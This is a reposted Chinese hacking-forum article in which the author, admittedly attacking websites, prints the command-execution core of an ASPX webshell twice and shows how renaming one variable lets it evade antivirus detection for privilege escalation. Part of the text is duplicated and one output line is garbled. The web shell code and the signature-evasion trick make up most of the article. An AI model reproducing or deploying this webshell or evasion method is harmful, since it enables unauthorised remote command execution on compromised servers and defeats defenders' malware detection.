导读:
今天黑站的时候,经常用的aspx马怎么也上传不了,断定是被杀了。
BBS.bitsCN.com网管论坛
要提权就得用aspx马,怎么办呢?网上找不到免杀的马。无赖之下,只有找出马中的特征码。
BBS.bitsCN.com网管论坛
尝试了好久。终于找到了。LOOK:bitsCN#com中国网管联盟
Sub RunCMD(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(cmdPath.Text)
myProcessStartInfo.UseShellExecute = False
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments="/c "&Cmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,">","<")
mystring=replace(mystring,"<",">")
result.text="Command = "&Cmd.text &vbcrlf &"
今天黑站的时候,经常用的aspx马怎么也上传不了,断定是被杀了。
BBS.bitsCN.com网管论坛
要提权就得用aspx马,怎么办呢?网上找不到免杀的马。无赖之下,只有找出马中的特征码。
BBS.bitsCN.com网管论坛
尝试了好久。终于找到了。LOOK:bitsCN#com中国网管联盟
Sub RunCMD(Src As Object, E As EventArgs)
Dim myProcess As New Process()
Dim myProcessStartInfo As New ProcessStartInfo(cmdPath.Text)
myProcessStartInfo.UseShellExecute = False
myProcessStartInfo.RedirectStandardOutput = true
myProcess.StartInfo = myProcessStartInfo
myProcessStartInfo.Arguments="/c "&Cmd.text
myProcess.Start()
Dim myStreamReader As StreamReader = myProcess.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myProcess.Close()
mystring=replace(mystring,">","<")
mystring=replace(mystring,"<",">")
result.text="Command = "&Cmd.text &vbcrlf &"
? pre>< &?< &mystring >?> Cmd.text=""
End Sub
BBS.bitsCN.com网管论坛
就是这段代码被定义了。准确的说是其中的myProcessStartInfo.RedirectStandardOutput = true这句有问题。
[bitsCN.Com]
可是要提权就要用到cmd.net ,删了还是不行。我的解决方法是把myProcess替换,比如上面代码可以替换成:
bitsCN~com
Sub RunCMD(Src As Object, E As EventArgs)
Dim myRedzz As New Process()
Dim myRedzzStartInfo As New ProcessStartInfo(cmdPath.Text)
myRedzzStartInfo.UseShellExecute = False
myRedzzStartInfo.RedirectStandardOutput = true
myRedzz.StartInfo = myRedzzStartInfo
myRedzzStartInfo.Arguments="/c "&Cmd.text
myRedzz.Start()
Dim myStreamReader As StreamReader = myRedzz.StandardOutput
Dim myString As String = myStreamReader.Readtoend()
myRedzz.Close()
mystring=replace(mystring,">","<")
mystring=replace(mystring,"<",">")
result.text="Command = "&Cmd.text &vbcrlf &"
? pre>< &?< &mystring >?> Cmd.text=""
End Sub
www@bitscn@com
其中把myProcess替换成myRedzz,这样就达到了免杀效果。
www@bitscn@com
可是不是说就绝对免杀了。任何杀毒软件都有不同,需要不断尝试和探索。
本文转自
http://www.bitscn.com/hack/safe/200802/124311.html